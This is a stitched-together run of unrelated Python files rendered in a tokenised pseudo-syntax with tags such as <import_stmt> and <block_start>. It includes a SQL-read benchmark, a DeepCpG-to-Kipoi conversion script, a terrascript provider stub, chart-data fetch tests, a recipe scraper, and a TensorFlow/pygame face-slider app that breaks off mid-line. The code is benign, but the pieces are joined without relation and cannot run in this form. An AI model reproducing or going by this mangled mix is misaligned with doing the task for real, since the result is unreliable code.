"""
This file is skipped during normal test runs because its file name does not start with "benchmarks".
"""<import_stmt>os<import_from_stmt>.. read_sql<def_stmt>read_sql_impl conn:str table:str<block_start>read_sql(conn f"""SELECT * FROM {table}""" partition_on="L_ORDERKEY" partition_num=10 )<block_end><def_stmt>bench_mysql benchmark<block_start>benchmark(read_sql_impl os.environ["MYSQL_URL"] os.environ["TPCH_TABLE"])<block_end><def_stmt>bench_postgres benchmark<block_start>benchmark(read_sql_impl os.environ["POSTGRES_URL"] os.environ["TPCH_TABLE"])<block_end>
|
"""The horizon component."""<line_sep>
|
<import_stmt>yaml<import_stmt>keras<import_stmt>json<import_stmt>shutil<import_stmt>os<import_from_stmt>deepcpg.utils make_dir to_list<import_from_stmt>deepcpg.models.utils decode_replicate_names encode_replicate_names get_sample_weights<line_sep>##### This function is needed to extract info on model architecture so that the output can be generated correctly.
<def_stmt>data_reader_config_from_model model config_out_fpath=<none> replicate_names=<none><block_start>"""Return the data reader configuration derived from `model`.
Builds the configuration needed to construct a :class:`DataReader` for `model`.
Parameters
----------
model: :class:`Model`
Trained Keras model whose input layers determine the configuration.
config_out_fpath: str
If not `None`, the configuration is also written to this path as JSON.
replicate_names: list
Name of input cells of `model`.
Returns
-------
dict
Data reader configuration dictionary.
"""<line_sep>use_dna=<false><line_sep>dna_wlen=<none><line_sep>cpg_wlen=<none><line_sep>output_names=<none><line_sep>encode_replicates=<false><line_sep>#
input_shapes=to_list(model.input_shape)<for_stmt>input_name,input_shape zip(model.input_names input_shapes)<block_start><if_stmt>input_name<eq>'dna'# Read DNA sequences.
<block_start>use_dna=<true><line_sep>dna_wlen=input_shape[1]<block_end><elif_stmt>input_name.startswith('cpg/state/')# DEPRECATED: legacy model. Decode replicate names from input name.
<block_start>replicate_names=decode_replicate_names(input_name.replace('cpg/state/' ''))<assert_stmt>len(replicate_names)<eq>input_shape[1]<line_sep>cpg_wlen=input_shape[2]<line_sep>encode_replicates=<true><block_end><elif_stmt>input_name<eq>'cpg/state'# Read neighboring CpG sites.
<block_start><if_stmt><not>replicate_names<block_start><raise>ValueError('Replicate names required!')<block_end><if_stmt>len(replicate_names)<ne>input_shape[1]<block_start>tmp='{r} replicates found but CpG model was trained with'<concat>' {s} replicates. Use `--nb_replicate {s}` or '<concat>' `--replicate_names` option to select {s} replicates!'<line_sep>tmp=tmp.format(r=len(replicate_names) s=input_shape[1])<line_sep><raise>ValueError(tmp)<block_end>cpg_wlen=input_shape[2]<block_end><block_end>output_names=model.output_names<line_sep>config={"output_names":output_names "use_dna":use_dna "dna_wlen":dna_wlen "cpg_wlen":cpg_wlen "replicate_names":replicate_names "encode_replicates":encode_replicates}<if_stmt>config_out_fpath<is><not><none><block_start><with_stmt>open(config_out_fpath "w")<as>ofh<block_start>json.dump(config ofh)<block_end><block_end><return>config<block_end><def_stmt>make_model_yaml template_yaml model_json output_yaml_path#
<block_start><with_stmt>open(template_yaml 'r')<as>f<block_start>model_yaml=yaml.load(f)<block_end>#
# get the model config:
json_file=open(model_json 'r')<line_sep>loaded_model_json=json_file.read()<line_sep>json_file.close()<line_sep>loaded_model=keras.models.model_from_json(loaded_model_json)<line_sep>#
model_yaml["schema"]["targets"]=[]<for_stmt>oname,oshape zip(loaded_model.output_names loaded_model.output_shape)<block_start>append_el={"name":oname "shape":str(oshape)#replace("None,", "")
"doc":"Methylation probability for %s"%oname}<line_sep>model_yaml["schema"]["targets"].append(append_el)<block_end>#
<with_stmt>open(output_yaml_path 'w')<as>f<block_start>yaml.dump(model_yaml f default_flow_style=<false>)<block_end><block_end><def_stmt>make_secondary_dl_yaml template_yaml model_json output_yaml_path<block_start><with_stmt>open(template_yaml 'r')<as>f<block_start>model_yaml=yaml.load(f)<block_end>#
# get the model config:
json_file=open(model_json 'r')<line_sep>loaded_model_json=json_file.read()<line_sep>json_file.close()<line_sep>loaded_model=keras.models.model_from_json(loaded_model_json)<line_sep>#
model_yaml["output_schema"]["targets"]=[]<for_stmt>oname,oshape zip(loaded_model.output_names loaded_model.output_shape)<block_start>append_el={"name":oname "shape":str(oshape)#replace("None,", "")
"doc":"Methylation probability for %s"%oname}<line_sep>model_yaml["output_schema"]["targets"].append(append_el)<block_end>#
<with_stmt>open(output_yaml_path 'w')<as>f<block_start>yaml.dump(model_yaml f default_flow_style=<false>)<block_end><block_end><import_stmt>errno<def_stmt>symlink_force target link_name<block_start><try_stmt><block_start>os.symlink(target link_name)<block_end><except_stmt>OSError<as>e<block_start><if_stmt>e.errno<eq>errno.EEXIST<block_start>os.remove(link_name)<line_sep>os.symlink(target link_name)<block_end><else_stmt><block_start><raise>e<block_end><block_end><block_end><def_stmt>softlink_files bpath model_name<block_start>print("Softlinking: {0}".format(model_name))<line_sep>symlink_force(bpath+"template/dataloader.yaml" bpath+"{0}/dataloader.yaml".format(model_name))<line_sep>#symlink_force("../template/model.yaml","{0}/model.yaml".format(model_name))
symlink_force(bpath+"template/dataloader.py" bpath+"{0}/dataloader.py".format(model_name))<line_sep>symlink_force(bpath+"template/example_files" bpath+"{0}/example_files".format(model_name))<block_end># prepare DeepCpG
deepcpg_bdir="/nfs/research2/stegle/users/rkreuzhu/deepcpg/deepcpg-1.0.4/scripts/"<line_sep>output_dir="/nfs/research2/stegle/users/rkreuzhu/kipoi_models_fork/models/DeepCpG"<line_sep>models=["Hou2016_HepG2_dna" "Hou2016_HCC_dna" "Hou2016_mESC_dna" "Smallwood2014_serum_dna" "Smallwood2014_2i_dna"]<for_stmt>model models<block_start>in_dir=os.path.join(deepcpg_bdir model)<line_sep>out_dir=os.path.join(output_dir model)<line_sep>model_files=os.path.join(out_dir "model_files")<if_stmt><not>os.path.exists(out_dir)<block_start>os.makedirs(out_dir)<block_end><if_stmt><not>os.path.exists(model_files)<block_start>os.makedirs(model_files)<block_end>shutil.copy(os.path.join(in_dir "model.json") model_files)<line_sep>shutil.copy(os.path.join(in_dir "model_weights.h5") model_files)<line_sep>make_model_yaml(os.path.join(output_dir "template" 'model_template.yaml') os.path.join(model_files "model.json") os.path.join(out_dir 'model.yaml'))<line_sep>make_secondary_dl_yaml(os.path.join(output_dir "template" 'dataloader_m_template.yaml') os.path.join(model_files "model.json") os.path.join(out_dir 'dataloader_m.yaml'))<try_stmt><block_start>os.unlink(output_dir+"/"+model+"/dataloader_m.py")<block_end><except_stmt><block_start><pass><block_end>shutil.copy(output_dir+"/"+"template/dataloader_m.py" output_dir+"/"+model)<line_sep>softlink_files(output_dir+"/" model)<line_sep>#
# generate the model config file:
json_file=open(os.path.join(model_files "model.json") 'r')<line_sep>loaded_model_json=json_file.read()<line_sep>json_file.close()<line_sep>loaded_model=keras.models.model_from_json(loaded_model_json)<line_sep>data_reader_config_from_model(loaded_model os.path.join(out_dir 'model_config.json') replicate_names=<none>)<block_end><for_stmt>model models<block_start>out_dir=os.path.join(output_dir model)<if_stmt>os.path.isdir(out_dir)<block_start>command="python /nfs/research2/stegle/users/rkreuzhu/opt/model-zoo/kipoi/__main__.py test %s"%out_dir<line_sep>ret=os.system(command)<assert_stmt>(ret<eq>0)<block_end><block_end>## test with custom dataloader:
<import_stmt>kipoi<line_sep>model=kipoi.get_model(out_dir source="dir")<line_sep>Dl=kipoi.get_dataloader_factory(out_dir+"/dataloader_m.yaml" source="dir")# fails
<import_stmt>os<line_sep>os.chdir(out_dir)<import_stmt>keras<import_stmt>kipoi<import_from_stmt>dataloader *<import_from_stmt>keras.models load_model<import_from_stmt>dataloader_m Dataloader<line_sep>samples=["example_files/BS27_1_SER.tsv" "example_files/BS27_3_SER.tsv" "example_files/BS27_5_SER.tsv" "example_files/BS27_6_SER.tsv" "example_files/BS27_8_SER.tsv"]<line_sep>ref="example_files/mm10"<line_sep>model=kipoi.get_model("./" source="dir")<line_sep>data_loader=Dataloader(samples ref outputs=<true>)<line_sep># the inputs, outputs, weights can then be returned from the dataloader...
ret=data_loader.__next__()<for_stmt>inputs,outputs,weights data_loader<block_start>preds=to_list(model.model.predict(inputs))<block_end>
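For reference, a hedged sketch of the dictionary that data_reader_config_from_model produces and writes to model_config.json; the window length and output names below are invented for a hypothetical DNA-only model.

# Hypothetical output for a model with a single 'dna' input of width 1001
# and two CpG output heads; actual values depend on the loaded architecture.
example_config = {
    "output_names": ["cpg/BS27_1_SER", "cpg/BS27_3_SER"],
    "use_dna": True,
    "dna_wlen": 1001,
    "cpg_wlen": None,
    "replicate_names": None,
    "encode_replicates": False,
}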
|
# terrascript/provider/dme.py
<import_stmt>terrascript<class_stmt>dme(terrascript.Provider)<block_start><pass><block_end>__all__=["dme"]<line_sep>
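A hedged usage sketch for the provider stub above: `terrascript.Terrascript()` and the `+=` syntax are part of python-terrascript, but the DNSMadeEasy credential argument names below are assumptions and must match the Terraform provider's actual schema.

import terrascript
from terrascript.provider.dme import dme  # the class defined above

ts = terrascript.Terrascript()
ts += dme(akey="access-key", skey="secret-key")  # argument names are placeholders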
|
# coding=utf8
<import_stmt>unittest<import_from_stmt>django_echarts.datasets.fetch fetch fetch_single ifetch_multiple<line_sep>DICT_LIST_DATA=[{'id':282 'name':'Alice' 'age':30 'sex':'female'} {'id':217 'name':'Bob' 'age':56} {'id':328 'name':'Charlie' 'age':56 'sex':'male'} ]<class_stmt>FetchTestCase(unittest.TestCase)<block_start><def_stmt>test_fetch_single self<block_start>names=fetch_single(DICT_LIST_DATA 'name')<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>sexs=fetch_single(DICT_LIST_DATA 'sex' default='male')<line_sep>self.assertListEqual(sexs ['female' 'male' 'male'])<block_end><def_stmt>test_ifetch_multiple self<block_start>names,ages=map(list ifetch_multiple(DICT_LIST_DATA 'name' 'age'))<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>self.assertListEqual(ages [30 56 56])<block_end><def_stmt>test_fetch self<block_start>names=fetch(DICT_LIST_DATA 'name')<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>sexs=fetch(DICT_LIST_DATA 'sex' default='male')<line_sep>self.assertListEqual(sexs ['female' 'male' 'male'])<line_sep>names,ages=fetch(DICT_LIST_DATA 'name' 'age')<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>self.assertListEqual(ages [30 56 56])<line_sep>names,ages,sexs=fetch(DICT_LIST_DATA 'name' 'age' 'sex' defaults={'sex':'male'})<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>self.assertListEqual(ages [30 56 56])<line_sep>self.assertListEqual(sexs ['female' 'male' 'male'])<block_end><block_end><class_stmt>MockItem<block_start><def_stmt>__init__ self x y z<block_start>self._data={'x':x 'y':y 'z':z}<block_end><def_stmt>get self key<block_start><return>self._data.get(key)<block_end><block_end><class_stmt>FetchCustomGetterTestCase(unittest.TestCase)<block_start><def_stmt>test_custom_getter self<block_start>data_list=[MockItem(1 2 3) MockItem(4 5 6) MockItem(7 8 9)]<line_sep>xs,ys,zs=fetch(data_list 'x' 'y' 'z' getter=<lambda>item key:item.get(key))<line_sep>self.assertListEqual([1 4 7] xs)<block_end><def_stmt>test_with_dict self<block_start>"""
Use dict.get(key) via a custom getter to pick items.
"""<line_sep>names,ages=fetch(DICT_LIST_DATA 'name' 'age' getter=<lambda>item key:item.get(key))<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>self.assertListEqual(ages [30 56 56])<block_end><block_end>
|
<import_from_stmt>bs4 BeautifulSoup<import_from_stmt>._abstract AbstractScraper<import_from_stmt>._utils normalize_string<class_stmt>KingArthur(AbstractScraper)<block_start>@classmethod<def_stmt>host cls<block_start><return>"kingarthurbaking.com"<block_end><def_stmt>title self<block_start><return>self.schema.title()<block_end><def_stmt>total_time self<block_start><return>self.schema.total_time()<block_end><def_stmt>yields self<block_start><return>self.schema.yields()<block_end><def_stmt>image self<block_start><return>self.schema.image()<block_end><def_stmt>ingredients self<block_start><return>self.schema.ingredients()<block_end><def_stmt>instructions self<block_start>"""
King Arthur updated their recipe markup so that `recipeInstructions` contains HTML, with each step wrapped in a
<p> tag. Parse the instructions assuming each step is wrapped in a <p> first, and fall back to returning the
raw schema instructions in case this format changes again.
"""<line_sep>schema_instructions=self.schema.instructions()<line_sep>soup=BeautifulSoup(schema_instructions "html.parser")<line_sep>instruction_elms=soup.findAll("p")<if_stmt>instruction_elms<block_start><return>"\n".join([normalize_string(elm.get_text())<for>elm instruction_elms])<block_end><return>schema_instructions<block_end><def_stmt>ratings self<block_start><return>self.schema.ratings()<block_end><block_end>
|
<import_stmt>html<import_stmt>math<import_stmt>pygame<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>pygame.locals *<import_from_stmt>scipy misc<line_sep>eigenvalues=np.load("eigenvalues.npy")<line_sep>eigenvectors=np.load("eigenvectors.npy")<line_sep>eigenvectorInverses=np.linalg.pinv(eigenvectors)<def_stmt>weight_variable shape<block_start>initial=tf.truncated_normal(shape stddev=0.1)<line_sep><return>tf.Variable(initial)<block_end><def_stmt>bias_variable shape<block_start>initial=tf.constant(0.1 shape=shape)<line_sep><return>tf.Variable(initial)<block_end>IMAGE_WIDTH=64<line_sep>IMAGE_HEIGHT=64<line_sep>IMAGE_COUNT=13016<line_sep>DENSE_SIZE=300<line_sep>learning_rate=0.0002# Used to be 0.001
settings=np.zeros((DENSE_SIZE ))<line_sep>approach_settings=np.zeros((2 ))<line_sep>approach_settings.fill(1)<line_sep>denseData=np.load("denseArray27K.npy")<line_sep>shouldICalculateImage=<true><line_sep>f=open('names/allNames.txt' 'r+')<line_sep>allNames=f.read()<line_sep>f.close()<line_sep>allPeople=html.unescape(allNames).split('\n')<line_sep>f=open('eigenvalueNames.txt' 'r+')<line_sep>eigenvalueNames=f.read().split('\n')<line_sep>f.close()<line_sep>nearestPerson=0<line_sep>meanData=denseData.mean(axis=0)<line_sep>inputs_=tf.placeholder(tf.float32 (<none> IMAGE_HEIGHT IMAGE_WIDTH 3) name='inputs')<line_sep>targets_=tf.placeholder(tf.float32 (<none> IMAGE_HEIGHT IMAGE_WIDTH 3) name='targets')<line_sep>""" Encoder """<line_sep>conv0=tf.layers.conv2d(inputs=inputs_ filters=120 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 64x64x120
maxpool0=tf.layers.max_pooling2d(conv0 pool_size=(2 2) strides=(2 2) padding='same')<line_sep># Now 32x32x120
conv1=tf.layers.conv2d(inputs=maxpool0 filters=160 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 32x32x160
maxpool1=tf.layers.max_pooling2d(conv1 pool_size=(2 2) strides=(2 2) padding='same')<line_sep># Now 16x16x160
conv2=tf.layers.conv2d(inputs=maxpool1 filters=200 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 16x16x200
maxpool2=tf.layers.max_pooling2d(conv2 pool_size=(2 2) strides=(2 2) padding='same')<line_sep># Now 8x8x200
conv3=tf.layers.conv2d(inputs=maxpool2 filters=240 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 8x8x240
maxpool3=tf.layers.max_pooling2d(conv3 pool_size=(2 2) strides=(2 2) padding='same')<line_sep># Now 4x4x240
maxpool3_flat=tf.reshape(maxpool3 [-1 4<times>4<times>240])<line_sep>W_fc1=weight_variable([4<times>4<times>240 300])<line_sep>b_fc1=bias_variable([300])<line_sep>tesy=tf.matmul(maxpool3_flat W_fc1)<line_sep>encoded=tf.nn.relu(tf.matmul(maxpool3_flat W_fc1)+b_fc1)<line_sep>W_fc2=weight_variable([300 4<times>4<times>240])<line_sep>b_fc2=bias_variable([4<times>4<times>240])<line_sep>predecoded_flat=tf.nn.relu(tf.matmul(encoded W_fc2)+b_fc2)<line_sep>predecoded=tf.reshape(predecoded_flat [-1 4 4 240])<line_sep>""" Decoder """<line_sep>upsample1=tf.image.resize_images(predecoded size=(8 8) method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)<line_sep># Now 8x8x240
conv4=tf.layers.conv2d(inputs=upsample1 filters=200 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 8x8x200
upsample2=tf.image.resize_images(conv4 size=(16 16) method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)<line_sep># Now 16x16x200
conv5=tf.layers.conv2d(inputs=upsample2 filters=160 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 16x16x160
upsample3=tf.image.resize_images(conv5 size=(32 32) method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)<line_sep># Now 32x32x160
conv6=tf.layers.conv2d(inputs=upsample3 filters=120 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 32x32x120
upsample4=tf.image.resize_images(conv6 size=(64 64) method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)<line_sep># Now 64x64x120
conv7=tf.layers.conv2d(inputs=upsample4 filters=15 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 64x64x15
logits=tf.layers.conv2d(inputs=conv7 filters=3 kernel_size=(3 3) padding='same' activation=<none>)<line_sep># Now 64x64x3
# Pass logits through sigmoid to get reconstructed image
decoded=tf.nn.sigmoid(logits)<line_sep># Pass logits through sigmoid and calculate the cross-entropy loss
loss=tf.nn.sigmoid_cross_entropy_with_logits(labels=targets_ logits=logits)<line_sep># Get cost and define the optimizer
cost=tf.reduce_mean(loss)<line_sep>opt=tf.train.AdamOptimizer(learning_rate).minimize(cost)<line_sep>sess=tf.Session()<line_sep>saver=tf.train.Saver()<line_sep>sess.run(tf.global_variables_initializer())<line_sep>saver.restore(sess "models/model27674.ckpt")<def_stmt>get_celeb_sliders i<block_start>traits=denseData[i]-meanData<line_sep><return>np.matmul(traits eigenvectorInverses)/eigenvalues<block_end>celebSliders=np.zeros(denseData.shape)<for_stmt>i range(denseData.shape[0])<block_start>celebSliders[i]=get_celeb_sliders(i)<block_end><def_stmt>calculate_image settings<block_start>real_settings=meanData.copy()<for_stmt>i range(DENSE_SIZE)<block_start>real_settings<augadd>settings[i]<times>eigenvalues[i]<times>eigenvectors[i]<block_end>real_settings=real_settings.reshape((1 DENSE_SIZE))<line_sep>reconstructed_image=sess.run([decoded] feed_dict={encoded:real_settings})<line_sep>ri_np=np.array(reconstructed_image).reshape((64 64 3))<line_sep>ri_np=np.swapaxes(ri_np 0 1)<line_sep>closest_celeb=np.argmin(np.linalg.norm((settings-celebSliders)<times>eigenvalues axis=1))<line_sep><return>ri_np<times>255 closest_celeb<block_end><def_stmt>create_special_children index parent_count file_name<block_start>total_image=np.zeros((240+264<times>parent_count 300 3))<line_sep>total_image.fill(255)<line_sep>parents=[-1]<times>parent_count<line_sep>child_settings=np.zeros((celebSliders[0].shape ))<for_stmt>i range(0 parent_count)<block_start><while_stmt>parents[i]<eq>-1<or>int(allPeople[parents[i]].split(",")[1])<g>10# fame rank must be 5 or better
<block_start>parents[i]=np.random.randint(IMAGE_COUNT)<block_end>parents[i]=13015<line_sep>child_settings<augadd>celebSliders[parents[i]]<block_end>child_settings<augdiv>parent_count<for_stmt>i range(0 parent_count+1)<block_start><if_stmt>i<eq>parent_count<block_start>img,_=calculate_image(child_settings)<block_end><else_stmt><block_start>img,_=calculate_image(celebSliders[parents[i]])<line_sep># img = np.swapaxes(misc.imread("data/dataFace"+str(parents[i])+".png"),0,1)
<block_end>total_image[24+i<times>264:216+i<times>264 24:216]=misc.imresize(img size=[192 192] interp='nearest')<block_end>blah=pygame.surfarray.make_surface(total_image)<for_stmt>i range(0 parent_count+1)<block_start>name="CHILD"<if_stmt>i<l>parent_count<block_start>name=allPeople[parents[i]].split(",")[0]<block_end>font=pygame.font.SysFont("Helvetica" 22)<line_sep>text_surface=font.render(name 1 (0 0 0))<line_sep>blah.blit(text_surface [24+264<times>i 220])<if_stmt>i<l>parent_count-1<block_start>font=pygame.font.SysFont("Helvetica" 48)<line_sep>blah.blit(font.render('^' 1 (0 0 0)) [240+264<times>i 100])<block_end><block_end>font=pygame.font.SysFont("Helvetica" 48)<line_sep>blah.blit(font.render('=' 1 (0 0 0)) [240+264<times>(parent_count-1) 100])<line_sep>pygame.image.save(blah "spesh/"+file_name+"{:03d}".format(index)+".png")<block_end><def_stmt>create_child_grid index parent_count file_name<block_start>total_image=np.zeros((264+264<times>parent_count 264+264<times>parent_count 3))<line_sep>total_image[264: 264: :]=255<line_sep>parents=[-1]<times>parent_count<for_stmt>i range(0 parent_count)<block_start>parents[i]=np.random.randint(IMAGE_COUNT)<line_sep>img,_=calculate_image(celebSliders[parents[i]])<line_sep># img = np.swapaxes(misc.imread("data/dataFace"+str(parents[i])+".png"),0,1)
big_img=misc.imresize(img size=[192 192] interp='nearest')<line_sep>total_image[24+(i+1)<times>264:216+(i+1)<times>264 24:216]=big_img<line_sep>total_image[24:216 24+(i+1)<times>264:216+(i+1)<times>264]=big_img<line_sep>total_image[264<times>(i+1):264<times>(i+2) 264<times>(i+1):264<times>(i+2)]=[0 255 0]<block_end><for_stmt>i range(0 parent_count)<block_start><for_stmt>j range(0 parent_count)<block_start>child_settings=(celebSliders[parents[i]]+celebSliders[parents[j]])/2<line_sep>img,_=calculate_image(child_settings)<line_sep>total_image[24+(i+1)<times>264:216+(i+1)<times>264 24+(j+1)<times>264:216+(j+1)<times>264]=misc.imresize(img size=[192 192] interp='nearest')<block_end><block_end>blah=pygame.surfarray.make_surface(total_image)<for_stmt>i range(0 parent_count)<block_start>name=allPeople[parents[i]].split(",")[0]<line_sep>font=pygame.font.SysFont("Helvetica" 22)<line_sep>text_surface=font.render(name 1 (255 255 255))<line_sep>blah.blit(text_surface [24+264<times>(i+1) 220])<line_sep>blah.blit(text_surface [24 220+264<times>(i+1)])<block_end>pygame.image.save(blah "spesh/{}{:03d}.png".format(file_name index))<block_end><def_stmt>create_family_tree index parent_count file_name<block_start>total_image=np.zeros((264<times>parent_count 264<times>parent_count 3))<line_sep>total_image.fill(255)<line_sep>parents=[-1]<times>parent_count<line_sep>allSettings=np.zeros((parent_count parent_count celebSliders[0].shape[0]))<for_stmt>i range(0 parent_count)<block_start>parents[i]=np.random.randint(IMAGE_COUNT)<line_sep>allSettings[0 i]=celebSliders[parents[i]]<line_sep>img,_=calculate_image(celebSliders[parents[i]])<line_sep># img = np.swapaxes(misc.imread("data/dataFace"+str(parents[i])+".png"),0,1)
big_img=misc.imresize(img size=[192 192] interp='nearest')<line_sep>total_image[24+i<times>264:216+i<times>264 40:232]=big_img<block_end><for_stmt>level range(1 parent_count)<block_start><for_stmt>i range(0 parent_count-level)<block_start>allSettings[level i]=(allSettings[level-1 i]+allSettings[level-1 i+1])<times>0.5<line_sep>img,_=calculate_image(allSettings[level i])<line_sep>x_start=24+i<times>264+level<times>132<line_sep>y_start=40+level<times>264<line_sep>total_image[x_start:x_start+192 y_start:y_start+192]=misc.imresize(img size=[192 192] interp='nearest')<line_sep>total_image[x_start+92:x_start+100 y_start-32:y_start]=0<line_sep>total_image[x_start:x_start+192 y_start-40:y_start-32]=0<line_sep>total_image[x_start:x_start+8 y_start-72:y_start-40]=0<line_sep>total_image[x_start+184:x_start+192 y_start-72:y_start-40]=0<block_end><block_end>blah=pygame.surfarray.make_surface(total_image)<for_stmt>i range(0 parent_count)<block_start>name=allPeople[parents[i]].split(",")[0]<line_sep>font=pygame.font.SysFont("Helvetica" 22)<line_sep>text_surface=font.render(name 1 (0 0 0))<line_sep>blah.blit(text_surface [20+264<times>i 14])<block_end>pygame.image.save(blah "spesh/{}{:03d}.png".format(file_name index))<block_end>WHITE=(255 255 255)<line_sep>BLACK=(0 0 0)<line_sep>RED=(255 50 50)<line_sep>YELLOW=(255 255 0)<line_sep>GREEN=(0 255 50)<line_sep>BLUE=(50 50 255)<line_sep>GREY=(200 200 200)<line_sep>ORANGE=(200 100 50)<line_sep>CYAN=(0 255 255)<line_sep>MAGENTA=(255 0 255)<line_sep>TRANS=(1 1 1)<line_sep>VISIBLE_COMPONENTS=20<line_sep>enteringName=<false><line_sep>isShiftPressed=<false><line_sep>enteredName=""<line_sep>frameTimer=0<line_sep>misspelledTimer=0<line_sep>scrollPosition=0<line_sep>stringToNameDict={}<line_sep>transitionTimes=np.zeros((2 ))<line_sep>transitionKeyFrames=np.zeros((2 DENSE_SIZE))<for_stmt>i range(len(allPeople))<block_start>line=allPeople[i]<line_sep>pieces=line.split(",")<line_sep>name=pieces[0]<line_sep>alpha_only_name=''.join(x<for>x name<if>(x.isalpha()<or>x<eq>' '))<line_sep>lower_name=alpha_only_name.lower()<if_stmt>len(lower_name)<ge>1<block_start>stringToNameDict[lower_name]=i<block_end><block_end><def_stmt>string_to_celeb st<block_start>alpha_only_name=''.join(x<for>x st<if>(x.isalpha()<or>x<eq>' '))<line_sep>lower_name=alpha_only_name.lower()<if_stmt>lower_name<not><in>stringToNameDict<block_start><return>-1<block_end><return>stringToNameDict[lower_name]<block_end>oops_image=pygame.image.load("oops.png")<line_sep>imagerect=oops_image.get_rect()<line_sep>calculatedImage,nearestPerson=calculate_image(settings)<class_stmt>Slider()<block_start><def_stmt>__init__ self i maxi mini x y w h<block_start>self.maxi=maxi<line_sep>self.mini=mini<line_sep>self.x=x<line_sep>self.y=y<line_sep>self.w=w<line_sep>self.h=h<line_sep>self.surf=pygame.surface.Surface((w h))<line_sep>self.hit=<false><line_sep>self.i=i<line_sep>self.font=pygame.font.SysFont("Helvetica" 16)<block_end><def_stmt>true_i self<block_start><return>self.i+scrollPosition<block_end><def_stmt>draw self<block_start>j=self.true_i()<line_sep>eigen="%.4f"%eigenvalues[j]<line_sep>name="PCA #"+str(self.true_i()+1)+" ("+eigen+")"<if_stmt>j<l>len(eigenvalueNames)-1<block_start>name=eigenvalueNames[j]<block_end>txt_surf=self.font.render(name 1 WHITE)<line_sep>txt_rect=txt_surf.get_rect(center=(self.w/2 13))<line_sep>s=70<if_stmt>self.i%2+(self.i<floordiv>2)%2<eq>1<block_start>s=100<block_end>self.surf.fill((s s s))<line_sep>pygame.draw.rect(self.surf (220 220 220) [10 30 self.w-20 5] 0)<for_stmt>g 
range(7)<block_start>pygame.draw.rect(self.surf (s+50 s+50 s+50) [9+(self.w-20)/6<times>g 40 2 5] 0)<block_end>self.surf.blit(txt_surf txt_rect)<line_sep>button_surf=pygame.surface.Surface((10 20))<line_sep>button_surf.fill(TRANS)<line_sep>button_surf.set_colorkey(TRANS)<line_sep>pygame.draw.rect(button_surf WHITE [0 0 10 20])<line_sep>surf=self.surf.copy()<line_sep>v=min(max(settings[j] -9999) 9999)<line_sep>pos=(10+int((v-self.mini)/(self.maxi-self.mini)<times>(self.w-20)) 33)<line_sep>button_rect=button_surf.get_rect(center=pos)<line_sep>surf.blit(button_surf button_rect)<line_sep>button_rect.move_ip(self.x self.y)<line_sep>screen.blit(surf (self.x self.y))<block_end><def_stmt>move self<block_start>j=self.true_i()<line_sep>settings[j]=(pygame.mouse.get_pos()[0]-self.x-10)/130<times>(self.maxi-self.mini)+self.mini<if_stmt>settings[j]<l>self.mini<block_start>settings[j]=self.mini<block_end><if_stmt>settings[j]<g>self.maxi<block_start>settings[j]=self.maxi<block_end><block_end><block_end><class_stmt>ApproachSlider()<block_start><def_stmt>__init__ self i maxi mini x y w h<block_start>self.maxi=maxi<line_sep>self.mini=mini<line_sep>self.x=x<line_sep>self.y=y<line_sep>self.w=w<line_sep>self.h=h<line_sep>self.surf=pygame.surface.Surface((w h))<line_sep>self.hit=<false><line_sep>self.i=i<line_sep>self.font=pygame.font.SysFont("Helvetica" 16)<block_end><def_stmt>draw self<block_start><if_stmt>self.i<eq>0<block_start>st="Go "+"%.1f"%(100<times>approach_settings[self.i])+"% the way to this celeb."<block_end><else_stmt><block_start>st="Speed of travel: "+"%.2f"%(100<times>(1-approach_settings[self.i]))+" frames"<block_end>txt_surf=self.font.render(st 1 WHITE)<line_sep>txt_rect=txt_surf.get_rect(center=(self.w/2 13))<line_sep>s=70+30<times>self.i<line_sep>self.surf.fill((s s s))<line_sep>pygame.draw.rect(self.surf (220 220 220) [10 35 self.w-20 5] 0)<line_sep>self.surf.blit(txt_surf txt_rect)<line_sep>button_surf=pygame.surface.Surface((10 30))<line_sep>button_surf.fill(TRANS)<line_sep>button_surf.set_colorkey(TRANS)<line_sep>pygame.draw.rect(button_surf WHITE [0 0 10 30])<line_sep>surf=self.surf.copy()<line_sep>v=min(max(approach_settings[self.i] -9999) 9999)<line_sep>pos=(10+int((v-self.mini)/(self.maxi-self.mini)<times>(self.w-20)) 38)<line_sep>button_rect=button_surf.get_rect(center=pos)<line_sep>surf.blit(button_surf button_rect)<line_sep>button_rect.move_ip(self.x self.y)<line_sep>screen.blit(surf (self.x self.y))<block_end><def_stmt>move self<block_start>approach_settings[self.i]=(pygame.mouse.get_pos()[0]-self.x-10)/(self.w-20)<times>(self.maxi-self.mini)+self.mini<if_stmt>approach_settings[self.i]<l>self.mini<block_start>approach_settings[self.i]=self.mini<block_end><if_stmt>approach_settings[self.i]<g>self.maxi<block_start>approach_settings[self.i]=self.maxi<block_end><block_end><block_end><def_stmt>draw_buttons <block_start>enb_shade=200<if_stmt>enteringName<block_start>enb_shade=math.sin(frameTimer<times>0.06)<times>40+200<block_end>enter_name_button=pygame.surface.Surface((300 120))<line_sep>pygame.draw.rect(enter_name_button (enb_shade enb_shade enb_shade) [5 5 290 110] 0)<line_sep>st="[Enter celeb name]"<if_stmt>len(enteredName)<ge>1<block_start>st=enteredName<block_end>button_data=[[(0 0) (300 60) (230 30 30) 44 "RANDOMIZE" WHITE] [(0 540) (300 60) (30 30 230) 44 "GO TO MEAN" WHITE] [(800 0) (300 120) (230 170 30) 44 "INVERT" WHITE] [(300 500) (500 100) (0 0 0) 24 